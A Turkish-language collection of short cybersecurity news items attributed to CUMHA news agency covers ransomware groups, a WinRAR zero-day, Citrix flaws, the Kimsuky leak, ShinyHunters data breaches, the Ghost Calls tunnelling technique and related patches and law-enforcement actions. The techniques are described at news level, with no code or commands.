Yöntem: aşk dolandırıcılığı ve e-posta saldırıları
Mahkeme belgelerine göre çete, çoğunlukla yalnız yaşayan yaşlı Amerikalıları sahte romantik ilişkilerle kandırdı. Güven kazandıktan sonra mağdurları para göndermeye ikna ettiler. ABD’deki aracılar parayı akladıktan sonra asıl faillerin bulunduğu Batı Afrika’ya gönderdi.

Çete aynı zamanda şirketleri de hedef aldı. Çalışanların veya müşterilerin e-posta adreslerini taklit eden sahte hesaplarla finans yetkililerini kandırarak milyonlarca dolarlık havaleler yaptırdılar. Sahte imzalı belgelerle transferleri meşrulaştırdılar.

“Chairmen” adıyla yönetilen yapı
Boateng ve Ahmed örgütte “chairman” (başkan) rolünü üstlenirken, Asare ve Van Yeboah da üst düzey konumlarda faaliyet gösterdi. Van Yeboah’ın özellikle aşk dolandırıcılığı operasyonlarında aktif rol aldığı belirlendi.

Ağır cezalar gündemde
Sanıklar; kablolu dolandırıcılık yapmak ve buna teşebbüs (20 yıla kadar), kara para aklama (20 yıl), çalıntı para alma ve buna teşebbüs (5 yıl) ve çalıntı parayı elde tutma (10 yıl) suçlamalarıyla yargılanacak.

Kaynak: CUMHA - CUMHUR HABER AJANSI

DarkBit saldırıları ve siyasi arka plan
2023’te gerçekleşen saldırıların, İran’daki mühimmat fabrikasına yönelik drone saldırılarının ardından misilleme amacı taşıdığı değerlendiriliyor. DarkBit grubu, daha önce İsrail’deki eğitim kurumlarını hedef almış ve propaganda içerikli fidye notları bırakmıştı. İsrail Ulusal Siber Komutanlığı, saldırıları MuddyWater ile ilişkilendirmişti.

Zayıf şifreleme yöntemi tespit edildi
Profero uzmanları, saldırıda kullanılan DarkBit fidye yazılımını analiz etti. Her dosya için AES-128-CBC ile üretilen anahtarların düşük entropiye sahip olduğu, zaman damgalarıyla birlikte olası kombinasyonların birkaç milyar ihtimale düştüğü keşfedildi.

ESXi sunucularındaki avantaj
Araştırmacılar, VMware sanal disk (VMDK) dosyalarının bilinen başlık baytlarını referans alarak brute force yöntemini hızlandırdı. Ayrıca VMDK dosyalarının seyrek yapısı nedeniyle, şifrelenmemiş geniş boşluklardan değerli verilerin doğrudan kurtarılabildiği belirlendi.

Fidye ödenmeden dosyalar geri alındı
Geliştirilen özel araç sayesinde, saldırganların talep ettiği 80 Bitcoin ödenmeden kritik dosyaların çoğu kurtarıldı. Profero, DarkBit’in fidye yerine veri silici (wiper) kullansaydı amacına daha uygun sonuç alabileceğini belirtti.

Kurtarma aracı halka açılmadı
Profero, DarkBit için geliştirdiği çözüm aracını kamuya açıklamayacağını, ancak gelecekte benzer saldırılardan etkilenen kurumların kendileriyle iletişime geçerek destek alabileceğini duyurdu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sıfır gün olarak kullanıldı
ESET, 18 Temmuz 2025’te RomCom grubunun WinRAR’daki belirsiz bir yol geçişi açığını istismar ettiğini tespit etti. Açık, alternatif veri akışlarının (ADS) kullanımıyla kötüye kullanılabiliyor ve CVE-2025-8088 olarak kaydedildi.

Zararlı dosyalar Startup klasörüne düşüyor
Hazırlanan RAR arşivlerinde sahte yollarla doldurulmuş çok sayıda ADS girdisi bulunuyor. Bunlar, zararlı DLL, EXE ve LNK dosyalarının arşiv açıldığında %TEMP% ve %LOCALAPPDATA% klasörlerine, kısayolların ise Windows Başlangıç klasörüne yerleştirilmesini sağlıyor.

Üç farklı saldırı zinciri
ESET, saldırılarda kullanılan üç ayrı enfeksiyon zinciri tespit etti:

• Mythic Agent: COM hijacking yoluyla AES şifreli shellcode çalıştırıyor, yalnızca belirli etki alanlarında aktif oluyor.

• SnipBot: Sahte bir PuTTY türeviyle yükleniyor, açılan belgeleri kontrol ederek ek zararlı indiriyor.

• MeltingClaw: RustyClaw üzerinden DLL indirip daha fazla modül çalıştırıyor.

Ek aktörler de açığı kullandı
Bi.Zone, CVE-2025-8088’in yanı sıra CVE-2025-6218 açığını da istismar eden “Paper Werewolf” adını verdiği farklı bir saldırı kümesini raporladı.

Güncelleme manuel yapılmalı
RARLab, açığın kapatıldığı 7.13 sürümünü 30 Temmuz’da yayımladı. Ancak WinRAR otomatik güncelleme özelliği içermediği için kullanıcıların en son sürümü manuel olarak indirip kurmaları gerekiyor.

Risk neden yüksek
Windows 2023’te RAR desteği eklese de kapsamı sınırlı. Kurumsal kullanıcılar ve ileri seviye bireysel kullanıcılar hâlen WinRAR’a bağımlı, bu da yazılımı saldırganlar için cazip hale getiriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Bellek taşması sıfır gün olarak kullanıldı
Citrix NetScaler ADC ve Gateway ürünlerinde bulunan CVE-2025-6543, bellek taşması nedeniyle yetkisiz komut çalıştırılmasına veya hizmet reddine yol açabiliyor. Açık, VPN, ICA Proxy, CVPN, RDP Proxy ve AAA sanal sunucularını etkiliyor.

Kritik kurumlar hedef oldu
NCSC, Mayıs 2025’ten itibaren saldırganların açığı sıfır gün olarak kullandığını ve Hollanda’daki birden fazla kritik kuruma sızdığını açıkladı. Saldırganlar izlerini silerek olayları tespit etmeyi zorlaştırdı.

Savcılık saldırıyı doğruladı
Hollanda Savcılığı (Openbaar Ministerie), 18 Temmuz’da sistemlerinin ihlal edildiğini duyurdu. Olay ciddi operasyonel kesintilere neden oldu, e-posta sunucuları ancak Ağustos başında yeniden çalışmaya başladı.

Citrix’in yayımladığı yamalar
Citrix, 25 Haziran’da yayımladığı bültende şu sürümlere güncelleme yapılmasını tavsiye etti:

• 14.1 → 14.1-47.46 ve sonrası

• 13.1 → 13.1-59.19 ve sonrası

• 13.1-FIPS ve 13.1-NDcPP → 13.1-37.236 ve sonrası
  12.1 ve 13.0 sürümleri içinse destek sona erdi, güncel sürümlere yükseltme öneriliyor.

Ek güvenlik adımları
Yamaların ardından aktif oturumların kapatılması (icaconnection, pcoipConnection, aaa, rdp) ve load balancing oturumlarının temizlenmesi tavsiye edildi. Ayrıca NCSC, olağan dışı PHP/XHTML dosyalarının tespiti için GitHub üzerinden bir tarama scripti yayımladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kimsuky’ye karşı etik çıkış
Sızıntıyı gerçekleştiren “Saber” ve “cyb0rg” takma adlı hackerlar, Phrack dergisinin DEF CON 33’te dağıtılan son sayısında, Kimsuky’yi “rejim çıkarlarına hizmet eden, etik dışı bir grup” olarak tanımladı. İkilinin açıklamasında, “Sanatı icra etmek yerine liderlerini zenginleştirmek için çalışan politik bir araçsınız” ifadeleri yer aldı.

8,9 GB veri çevrim içi yayımlandı
Distributed Denial of Secrets platformunda yayımlanan arşiv, Kimsuky’nin oltalama günlüklerini, çalıntı verilerini ve araçlarını içeriyor. Bunlar arasında:

• Güney Kore Savunma Karşı İstihbarat Komutanlığı’na (dcc.mil.kr) ait oltalama kayıtları,

• Güney Kore Dışişleri Bakanlığı’nın e-posta sistemi (“Kebi”) kaynak kodu,

• Vatandaşlık sertifikaları ve akademisyen listeleri,

• Sahte site oluşturma kiti (PHP Generator), canlı oltalama kitleri,

• Cobalt Strike yükleyicileri, ters bağlantı araçları ve Onnara proxy modülleri,

• VPN alımları, GitHub bağlantıları ve hack forumu kullanım kayıtları.

Operasyonel zorluk yaratabilir
Bitirici bir darbe olmasa da, uzmanlara göre bu ifşa Kimsuky’nin altyapısının “yanmasını” sağlayarak devam eden kampanyalarda aksamalara yol açabilir. Ayrıca, sızan belgeler Kimsuky’nin daha önce belgelenmemiş yöntemlerini ortaya çıkarıyor.

Araştırmacılar doğrulamaya çalışıyor
Sızdırılan dosyaların doğruluğu henüz bağımsız olarak tam teyit edilmedi. Ancak içerik, Kimsuky’nin bilinen faaliyetleriyle güçlü örtüşmeler taşıyor. Güvenlik araştırmacıları, sızıntının değerini analiz etmeye devam ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ulusal Muhafızlar devreye girdi
29 Temmuz’da yaşanan saldırı sonrası Minnesota Valisi Tim Walz, şehrin olay müdahale kapasitesini aşan bu durum için Ulusal Muhafızları siber koruma desteği vermek üzere görevlendirdi. Şehir, çevrim içi ödemeler de dahil olmak üzere birçok hizmetin geçici olarak kesintiye uğradığını açıkladı.

Interlock saldırıyı üstlendi
Saint Paul Belediye Başkanı Melvin Carter, saldırının Interlock fidye yazılım grubu tarafından gerçekleştirildiğini ve fidye ödenmediğini doğruladı. Carter, vatandaşların kişisel veya finansal bilgilerinin saldırıdan etkilenmediğini söyledi.

66 bin dosya sızdırıldı
Interlock grubu, karanlık ağdaki sitesinde Saint Paul’u hedef olarak listeledi ve 43 GB büyüklüğünde, 66 binden fazla dosyayı ele geçirdiğini öne sürdü. Saldırganlar bu verilerin bir kısmını yayımladı.

Saldırının izleri
PRODAFT’ın açıklamasına göre saldırı, 20 Temmuz civarında şehir sistemlerine bulaştırılan ve Interlock’la ilişkilendirilen özel geliştirilmiş SystemBC RAT zararlısıyla başladı.

Grubun geçmişi
Eylül 2024’te ortaya çıkan Interlock, dünya genelinde özellikle sağlık kuruluşlarını hedef aldı. Daha önce İngiltere’deki üniversitelere NodeSnake trojanıyla saldırmış, DaVita’dan 1,5 TB ve Kettering Health’ten büyük miktarda veri çaldığını duyurmuştu. CISA ve FBI, saldırıdan günler önce Interlock’un kritik altyapılara yönelik çift şantajlı saldırılarında artış olduğunu açıklamıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kritik açığa karşı cihazlar savunmasız
Citrix NetScaler cihazlarında tespit edilen CVE-2025-5777 (CitrixBleed 2) açığı, yetersiz girdi doğrulaması nedeniyle oluşan “out-of-bounds memory read” hatasından kaynaklanıyor. Hedef alınan cihazlar arasında VPN, ICA Proxy, CVPN, RDP Proxy ve AAA sanal sunucuları bulunuyor.

Oturum ele geçirme riski
Açık, saldırganlara oturum belirteçleri, kimlik bilgileri ve hassas verileri çalma imkânı tanıyor. Böylece kullanıcı oturumlarını ele geçirerek çok faktörlü kimlik doğrulamayı atlatabiliyorlar. Açık ilk olarak sıfır gün saldırılarında istismar edildi, kısa süre sonra da PoC exploit kodları yayımlandı.

Hâlâ binlerce cihaz açıkta
Shadowserver’ın 11 Ağustos raporuna göre dünya genelinde 3.312 cihaz hâlâ CVE-2025-5777’e karşı korunmasız. Ayrıca 4.142 cihaz, DoS saldırılarında aktif olarak istismar edilen başka bir kritik açık (CVE-2025-6543) için de yamalanmamış durumda.

Hollanda’da kritik kurumlar hedef alındı
Hollanda Ulusal Siber Güvenlik Merkezi (NCSC), CVE-2025-6543 açığının Mayıs ayından bu yana sıfır gün olarak kullanıldığını, kritik kuruluşların saldırıya uğradığını ve izlerin saldırganlar tarafından silindiğini duyurdu. Temmuz ayında Hollanda Savcılığı’nın (Openbaar Ministerie) saldırı sonrası e-posta sunucularında haftalarca kesinti yaşadığı açıklandı.

ABD kurumlarına zorunlu talimat
ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), iki açığı da aktif istismar edilen zafiyetler listesine ekleyerek federal kurumlara CVE-2025-5777 için 1 gün, CVE-2025-6543 için ise 21 Temmuz’a kadar yamaları uygulama talimatı verdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Rusya çıkarlarıyla uyumlu operasyonlar
Bitdefender araştırmacıları, Curly COMrades adını verdikleri yeni bir siber casusluk grubunun Gürcistan’daki devlet ve yargı kurumlarını, Moldova’daki enerji şirketlerini hedef aldığını açıkladı. Grup, bilinen APT’lerle doğrudan örtüşmese de operasyonlarının Rusya’nın jeopolitik hedefleriyle paralellik gösterdiği ifade edildi.

MucorAgent arka kapısı
Grubun saldırılarında kullandığı MucorAgent zararlısı üç aşamalı yapıya sahip. İlk aşamada COM nesneleri ele geçirilerek ikinci aşama yükleniyor; bu bileşen Windows’un Antimalware Scan Interface (AMSI) korumasını atlatıyor. Üçüncü aşama ise belirli dizinlerde bulunan şifrelenmiş PNG dosyalarındaki verileri (muhtemelen komut dosyaları) çalıştırıyor.

Kalıcı erişim için yaratıcı yöntemler
Araştırmacılar, saldırganların NGEN (Native Image Generator) bileşenini hedef alarak devre dışı görünen ancak belirli durumlarda çalışan zamanlanmış görevleri kötüye kullandığını tespit etti. Ayrıca, Resocks proxy aracı, SOCKS5 sunucuları, SSH + Stunnel tünelleme ve CurlCat gibi özel geliştirilmiş araçlar kullanıldı.

Hedef: Kimlik bilgileri ve ağ hareketi
Saldırganların etki alanı denetleyicilerinden NTDS veritabanını ve LSASS bellek dökümlerini çıkarmaya çalıştığı, ağda kalıcı erişim için geçerli kimlik bilgilerini toplamaya odaklandığı belirtildi. Ayrıca netstat, tasklist, systeminfo, wmic, ipconfig gibi komutlar ve Active Directory keşfi için PowerShell betikleri kullanıldı.

Gizlilik çabaları sonuçsuz kaldı
Curly COMrades’in “living-off-the-land” teknikleri, açık kaynak araçları ve yoğun COM manipülasyonlarıyla gizlilik sağlamaya çalıştığı, ancak modern EDR/XDR sistemlerinin bu faaliyetleri tespit edecek kadar gürültü oluştuğu kaydedildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

En yüksek güvenlik standardı
pKVM, Android cihazlarda sanallaştırma çerçevesinin çekirdeğini oluşturan hipervizör. Google, sistemin DEKRA tarafından akredite laboratuvarlarda test edildiğini ve gelişmiş tehditlere karşı dirençli olduğunun doğrulandığını duyurdu.

SESIP Level 5 nedir
SESIP (Security Evaluation Standard for IoT Platforms), IoT ve mobil platformlar için geliştirilen bir güvenlik standardı. Level 5, Common Criteria’nin (ISO 15408) en yüksek güvenlik seviyesi olan AVA_VAN.5’e eşdeğer. Bu seviye, pKVM’nin sofistike saldırılara karşı dayanıklı olduğunu ortaya koyuyor.

pKVM’nin kullanım alanları
Hipervizör, Android cihazlarda kritik görevlerin güvenli şekilde çalıştırılmasını sağlıyor. Bunlar arasında:

• Google’ın Gemini Nano gibi yapay zekâ modellerinin cihaz üzerinde çalıştırılması,

• biyometrik kimlik doğrulama (yüz, parmak izi),

• DRM korumalı içeriklerin işlenmesi,

• cihazın firmware düzeyinde güvenlik fonksiyonları bulunuyor.

Kullanıcılar için anlamı
Google’a göre akıllı telefonlar artık yalnızca kişisel bilgileri değil, aynı zamanda yapay zekâ modelleriyle işlenen yüksek değerli verileri de barındırıyor. Bu da saldırganlar için cazip bir hedef oluşturuyor. SESIP Level 5 sertifikası, Android cihazlarda bu verilerin güvenliğinin daha üst düzeyde sağlanacağı anlamına geliyor.

Google’dan açıklama
Android Güvenlik ve Gizlilik Başkan Yardımcısı Dave Kleidermacher, “Cihaz üzerinde yapılan işlemeler arttıkça, kişisel veriler daha değerli hale geliyor. Bu nedenle güçlü güvenlik önlemleri zorunlu” diyerek sertifikanın önemini vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

1 milyon dolarlık kriptoya el konuldu
ABD Adalet Bakanlığı, BlackSuit fidye yazılımı grubuna ait dijital varlıkların 9 Ocak 2024’te ele geçirildiğini açıkladı. Söz konusu varlıkların değeri 1.091.453 dolar olarak açıklandı. Kripto paralar, suçlular tarafından farklı borsalar üzerinden defalarca transfer edilerek izleri gizlenmeye çalışılırken tespit edilip donduruldu.

Fidye ödemesinden kaynaklanıyor
Yetkililere göre el konulan varlıklar, 4 Nisan 2023’te fidye ödemesi yapan bir kurbanın gönderdiği 49,3 Bitcoin’den elde edildi. O dönemde bu ödemenin değeri yaklaşık 1,44 milyon dolardı.

Operation Checkmate ile bağlantılı
Bu duyuru, uluslararası “Operation Checkmate” operasyonu kapsamında BlackSuit’in gasp sitelerinin ele geçirilmesinin ardından geldi. Operasyon, BlackSuit ile bağlantılı Royal, Quantum ve Chaos fidye yazılım platformlarını da hedef aldı.

ABD’de 450 kuruluşa saldırdılar
Geçen hafta ABD İç Güvenlik Bakanlığı, Royal ve BlackSuit çetelerinin sağlık, eğitim, enerji, kamu güvenliği ve devlet kurumları dahil 450’den fazla ABD kuruluşunu hedef aldığını açıkladı. Bu saldırılardan toplam 370 milyon dolar değerinde fidye ödemesi elde edildi.

Daha önce 20 Bitcoin’e el konulmuştu
28 Temmuz’da FBI Dallas, Chaos fidye yazılımı grubuyla bağlantılı bir adreste 20 Bitcoin’e (yaklaşık 2,4 milyon dolar) el koyduğunu duyurmuştu.

Stratejik öneme sahip hamle
Adalet Bakanlığı, suçtan elde edilen gelirlerin ele geçirilmesinin, yakalanamayan operatörlerin finansal gücünü kırmak ve altyapılarını yeniden kurmalarını engellemek için kritik öneme sahip olduğunu vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Toplam 107 güvenlik açığı kapatıldı
Microsoft’un bu ay yayımladığı yama paketi 44 yetki yükseltme, 35 uzaktan kod yürütme, 18 bilgi ifşası, 4 hizmet reddi ve 9 sahtecilik açığını gideriyor. Bu açıkların 13’ü “kritik” olarak sınıflandırıldı.

Kerberos’ta sıfır gün açığı
En dikkat çekici güncelleme, CVE-2025-53779 kodlu Windows Kerberos açığı oldu. Bu açık, doğrulanmış bir saldırganın domain yöneticisi ayrıcalıkları elde etmesine imkân tanıyor. Açığın teknik detayları Mayıs 2025’te Akamai’den Yuval Gordon tarafından yayımlanmıştı.

Kritik uzaktan kod yürütme açıkları
Düzeltmeler arasında Microsoft Office (Word, Excel, PowerPoint, Visio), SharePoint, SQL Server, Windows GDI+ ve Message Queuing bileşenlerinde kritik seviyede RCE açıkları da bulunuyor. Bu açıklar, saldırganların kullanıcı etkileşimi olmadan sistem üzerinde zararlı kod çalıştırmasına yol açabiliyor.

Öne çıkan diğer yamalar

• Exchange Server: CVE-2025-53786, hibrit kurulumlarda bulut ortamına yetkisiz erişim sağlayabilecek yetki yükseltme açığı.

• Windows NTLM: Kritik yetki yükseltme zafiyeti.

• Hyper-V: Hem DoS hem de uzaktan kod yürütme açıkları.

• Microsoft Teams: Uzaktan kod çalıştırma açığı.

Diğer üretici yamalarıyla paralel
Ağustos güncellemeleri, son haftalarda diğer üreticilerden gelen yamaları da takip ediyor. 7-Zip, Adobe, Cisco, Fortinet, Google (Android), SAP ve Trend Micro da aktif olarak istismar edilen açıklar için güvenlik güncellemeleri yayımladı.

Uzmanlardan öneri
Siber güvenlik uzmanları, özellikle Kerberos açığı ve Office ürünlerindeki RCE açıklarının kurumlar için ciddi risk oluşturduğunu belirterek güncellemelerin gecikmeden uygulanması gerektiğini vurguluyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tehlike Docker Hub’da sürüyor
Binarly araştırmacıları, Docker Hub’da barındırılan en az 35 Linux imajında XZ-Utils arka kapısının hâlâ bulunduğunu tespit etti. Bu imajların bazıları, üzerinde inşa edilen yeni imajları da dolaylı olarak enfekte ediyor.

XZ-Utils arka kapısı nedir
XZ-Utils sıkıştırma aracının 5.6.0 ve 5.6.1 sürümlerinde tespit edilen arka kapı, liblzma.so kütüphanesine gizlenmişti. Kod, OpenSSH’deki RSA_public_decrypt fonksiyonunu ele geçiriyor ve özel bir anahtara sahip saldırganın SSH üzerinden root yetkisiyle giriş yapmasına olanak tanıyordu.

Debian imajları kaldırmadı
Araştırmacıların uyarılarına rağmen Debian, 64 bitlik bazı imajları Docker Hub’dan çekmediğini doğruladı. Gerekçe olarak, istismarın düşük ihtimalle gerçekleşebileceği ve eski imajların “tarihsel arşiv” olarak korunması gerektiği belirtildi.

Risk halen devam ediyor
Binarly, bu yaklaşımın yanlış olduğunu ve bu imajların kamuya açık tutulmasının, otomatik yapılar veya yanlışlıkla indirmeler yoluyla ciddi risk oluşturduğunu vurguladı.

Kullanıcılara tavsiye
Uzmanlar, kullanılan imajların manuel olarak kontrol edilmesi ve XZ-Utils’in en az 5.6.2 sürümüne güncellenmiş olduğunun doğrulanması gerektiğini hatırlatıyor. En güncel sürüm 5.8.1 olarak yayımlanmış durumda.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Veri sızıntısı doğrulandı
Allianz Life, Temmuz 2025’te CRM sistemlerinden büyük çaplı bir veri hırsızlığı yaşadığını açıklamıştı. Hafta sonu itibarıyla ShinyHunters grubu, çalınan “Accounts” ve “Contacts” veritabanı tablolarını internette yayımladı. Bu tablolar, 2,8 milyon müşteri ve iş ortağı kaydını içeriyor.

Hangi veriler ifşa oldu
Sızdırılan dosyalarda kişisel bilgiler (isim, adres, telefon numarası, doğum tarihi, vergi kimlik numarası) ile mesleki bilgiler (lisanslar, kurum bağlantıları, ürün onayları ve pazarlama sınıflandırmaları) yer alıyor. BleepingComputer, verilerin doğruluğunu etkilenen kişilerle teyit etti.

Saldırının yöntemi
2025’in başında başlayan saldırı dalgasında tehdit aktörleri, çalışanları kandırarak şirketlerin Salesforce sistemlerine kötü amaçlı OAuth uygulamaları bağlatıyor. Bu bağlantılar üzerinden veritabanlarını indirip şirketlere fidye talebi gönderiyorlar.

Hacker gruplarının birleşimi
ShinyHunters, saldırının ardından yaptığı açıklamada Scattered Spider ile tek grup olduklarını duyurdu. Grup, daha önce Snowflake saldırısında da benzer yöntemlerle veri çalmıştı. Araştırmacılar, Lapsus$ grubunun eski üyelerinin de bu saldırılarda rol almış olabileceğini değerlendiriyor.

Allianz Life sessiz
Şirket, devam eden soruşturmayı gerekçe göstererek sızdırılan veriler hakkında yorum yapmadı. Ancak uzmanlar, ifşa edilen verilerin kimlik hırsızlığı ve dolandırıcılık risklerini artırdığı uyarısında bulunuyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Google da saldırıya uğradı
Google, dün gece yaptığı güncellemede Haziran ayında şirketin bir Salesforce CRM örneğinin ShinyHunters tarafından hedef alındığını doğruladı. Saldırıda küçük ve orta ölçekli işletmelere ait iletişim bilgileri ve notların indirildiği belirtildi.

Veriler sınırlı ama risk devam ediyor
Google’ın açıklamasına göre çalınan veriler esasen işletme adı ve iletişim bilgileri gibi büyük ölçüde kamuya açık bilgilerden oluşuyor. Ancak saldırı, müşteri güvenliği açısından dikkat çekici bulunuyor.

ShinyHunters kampanyası genişliyor
ShinyHunters, yıllardır Oracle Cloud, Snowflake, AT&T, Wattpad, MathWay gibi kurumlara yönelik saldırılarla biliniyor. Grup, son dönemde Adidas, Qantas, Allianz Life, Cisco, Louis Vuitton, Dior ve Tiffany & Co. gibi şirketlerin Salesforce sistemlerini de hedef aldı.

Vishing ve şantaj yöntemleri
Saldırılar, çalışanları hedef alan telefonla oltalama (vishing) teknikleriyle başlatılıyor. Grup, ele geçirdiği verileri kullanarak şirketlere e-posta yoluyla fidye talep ediyor. Şirketler ödeme yapmazsa verilerin sızdırılacağı tehdidinde bulunuyor. Bazı firmaların şimdiden ödeme yaptığı, bir şirketin verilerini sızdırmamak için yaklaşık 400 bin dolar değerinde Bitcoin gönderdiği öğrenildi.

Google’ın önlemleri
Google, saldırının ardından etki analizini tamamladığını ve gerekli güvenlik önlemlerini devreye aldığını açıkladı. Ancak ShinyHunters’ın saldırıları hâlen sürdüğü ve daha fazla büyük şirketin risk altında olduğu bildirildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Görüşme trafiği kılıfında saldırı
Praetorian araştırmacısı Adam Crosser, “Ghost Calls” yöntemini BlackHat USA’da sundu. Bu teknik, Zoom ve Teams gibi konferans uygulamalarında kullanılan TURN protokolünü kullanarak saldırganların kurban sistem ile kendi altyapıları arasında WebRTC tüneli açmasına olanak sağlıyor.

Nasıl çalışıyor
Bir kullanıcı Zoom ya da Teams toplantısına katıldığında, geçici TURN kimlik bilgileri alıyor. Ghost Calls, bu kimlik bilgilerini kötüye kullanarak saldırgan ile hedef sistem arasında şifrelenmiş bir WebRTC tüneli kuruyor. Bu tünel, saldırı trafiğini normal konferans trafiği gibi gösterdiği için güvenlik duvarları, proxy’ler ve TLS denetimleri tarafından fark edilmiyor.

Yeni araç: TURNt
Crosser, “TURNt” adlı açık kaynak bir araç geliştirdi. Bu araç, saldırgan tarafında bir Controller (SOCKS proxy sunucusu) ve kurban sistemde çalışan bir Relay bileşeninden oluşuyor. TURN sunucuları üzerinden C2 trafiğini tünelleyebilen TURNt, SOCKS proxying, port yönlendirme, veri sızdırma ve gizli VNC bağlantılarına imkân sağlıyor.

Zoom’dan ilk önlem
Zoom, BleepingComputer’a yaptığı açıklamada, Ghost Calls’a karşı TURN altyapısının yalnızca medya sunucularla eşleşmeye izin verecek şekilde güncellendiğini ve peer-to-peer bağlantıların engellendiğini duyurdu. Microsoft’un ek önlem planlarına dair ise henüz bir bilgi bulunmuyor.

Tehditin önemi
Ghost Calls, herhangi bir sıfır gün zafiyetine ihtiyaç duymadan, tamamen mevcut protokollerin doğasından yararlanıyor. Uzmanlara göre bu tür yöntemler, saldırganlara hem performans hem de anonimlik sağlıyor ve geleneksel C2 yöntemlerine göre daha gizli ilerliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Meşru sürücüyle güvenlik devre dışı bırakılıyor
Akira fidye yazılımı, ThrottleStop aracıyla kullanılan Intel sürücüsü “rwdrv.sys” üzerinden çekirdek seviyesinde erişim sağlıyor. Ardından “hlpdrv.sys” adlı kötü amaçlı sürücüyü yükleyerek Windows Defender’ın DisableAntiSpyware ayarını değiştiriyor ve korumaları devre dışı bırakıyor.

BYOVD tekniğiyle saldırı
Bu yöntem, “Bring Your Own Vulnerable Driver” (BYOVD) saldırı tekniğinin bir örneği. Yasal olarak imzalı ancak güvenlik açıkları bulunan sürücüler kullanılarak sistemde ayrıcalık yükseltiliyor. Akira’nın bu tekniği son haftalarda tekrarlayan saldırılarda sıkça görüldü.

SonicWall VPN saldırılarıyla bağlantı
Akira grubu kısa süre önce SonicWall SSLVPN servislerini de hedef aldı. Zero-day açık ihtimali gündeme gelse de, SonicWall henüz doğrulama yapmadı. Şirket, SSLVPN’in sınırlandırılması, MFA zorunluluğu, botnet/Geo-IP filtreleri ve kullanılmayan hesapların silinmesi gibi acil önlemler önerdi.

Sahte yazılım siteleriyle yayılıyor
The DFIR Report’a göre saldırılarda trojanlı MSI kurulum dosyaları kullanılıyor. “ManageEngine OpManager” gibi yazılımları arayan kullanıcılar, SEO zehirlemesi yoluyla opmanager[.]pro gibi sahte sitelere yönlendiriliyor. Bu sitelerden indirilen dosyalar, Bumblebee yükleyicisi aracılığıyla Akira’nın sisteme yerleşmesini sağlıyor.

Saldırıların ilerleyişi
Bumblebee, DLL yan yükleme yöntemiyle başlatılıyor, ardından AdaptixC2 ile kalıcı erişim sağlanıyor. Saldırganlar FileZilla üzerinden veri sızdırıyor, RustDesk ve SSH tünelleriyle kalıcılığı sürdürüyor. Ortalama 44 saat içinde “locker.exe” fidye yazılımı devreye giriyor ve etki alanlarındaki sistemler şifreleniyor.

Uzmanlardan uyarı
Güvenlik araştırmacıları, yalnızca resmi kaynaklardan yazılım indirilmesini, Akira ile ilgili IoC’lerin yakından takip edilmesini ve BYOVD tabanlı saldırılara karşı güvenlik çözümlerinin güncel tutulmasını öneriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı müşteri hizmeti platformunda gerçekleşti
Air France ve KLM, 6 Ağustos 2025’te yaptıkları açıklamada, kullandıkları harici müşteri hizmeti platformunda olağandışı hareket tespit edildiğini ve bunun sonucunda müşteri verilerine yetkisiz erişim sağlandığını açıkladı.

Finansal veriler etkilenmedi
Şirketten yapılan duyuruda, saldırganların isim, e-posta adresi, telefon numarası, ödül programı bilgileri ve son işlem kayıtlarına ulaştığı, ancak müşterilerin finansal bilgilerinin ve kişisel güvenlik verilerinin etkilenmediği vurgulandı.

Yetkililer bilgilendirildi, müşteriler uyarıldı
KLM, olayı Hollanda Veri Koruma Kurumu’na, Air France ise Fransa’daki CNIL’e bildirdi. Etkilenen müşterilere uyarı mesajları gönderilerek şüpheli e-posta ve telefon aramalarına karşı dikkatli olmaları gerektiği belirtildi.

ShinyHunters grubuna bağlanıyor
BleepingComputer’un ulaştığı bilgilere göre olay, Salesforce platformlarını hedef alan ve Adidas, Qantas, Dior, Louis Vuitton, Chanel, Tiffany & Co. ile Google gibi markaları da etkileyen ShinyHunters grubunun sosyal mühendislik saldırılarıyla bağlantılı.

Havacılık sektörü saldırıların odağında
Air France–KLM olayı, son dönemde havacılık ve ulaşım sektörüne yönelen saldırıların bir parçası olarak değerlendiriliyor. Daha önce Scattered Spider grubu WestJet ve Hawaiian Airlines gibi firmaları hedef almıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yıllardır korsan yayın yapıyordu
Kuzey Carolina merkezli Rare Breed TV, dünyanın en büyük korsan IPTV hizmetlerinden biri olarak öne çıkıyordu. Platform, aylık 15,99 dolardan başlayan aboneliklerle binlerce canlı kanal ve 14 bini aşkın film-dizi arşivi sunuyordu.

ACE’den yaptırım kararı
Amazon, Netflix, Disney, Warner Bros. ve Apple TV+ gibi 50’den fazla şirketin yer aldığı ACE, korsan IPTV hizmetini tespit ettikten sonra işletmecilerle iletişime geçti. Taraflar arasında varılan anlaşmayla platformun kapatılması ve ciddi miktarda tazminat ödenmesi kararlaştırıldı.

Site hâlen erişime açık
ACE açıklamasına rağmen Rare Breed TV’nin web sitesinin habere konu tarihte hâlâ erişime açık olduğu ve abonelik satışına devam ettiği görüldü. Konuyla ilgili olarak ACE’den ek yorum alınamadı.

Küresel korsan yayın operasyonları hedefte
ACE, bugüne kadar Openload, Streamango, Beast IPTV, 123movies.la ve anime platformu Zoro.to gibi çok sayıda korsan servisi kapattı. Geçtiğimiz yıl Jetflicks davasında beş kişiye ceza verilmesine, 22 milyon kullanıcılı ve aylık 250 milyon euro gelir elde eden bir korsan ağının çökertilmesine ve 821 milyon yıllık ziyaretçiye sahip Markkystreams’in kapatılmasına da katkı sağladı.

Uyarı niteliğinde mesaj
ACE’nin bağlı olduğu Sinema Filmleri Derneği (MPA) Başkan Yardımcısı Larissa Knapp, “Bu yaptırım korsan yayıncılara ciddi bir uyarıdır. Yasadışı yayın hizmeti işletmek, davalar, ağır mali cezalar ve kalıcı kapatmalarla sonuçlanır” dedi.

